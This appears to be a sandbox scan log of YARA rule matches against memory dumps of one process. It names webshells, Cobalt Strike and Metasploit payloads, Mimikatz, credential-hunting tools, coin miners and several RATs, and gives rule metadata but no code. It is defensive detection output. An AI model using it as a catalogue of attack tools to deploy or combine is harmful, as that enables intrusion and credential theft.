Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp, type: MEMORY Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, type: MEMORY Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6354837161.00000197A4180000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6341599132.00000197A3621000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000024.00000003.6350988033.00000197A3FA2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Ham_backdoor author = Cylance Spear Team, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6356061064.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
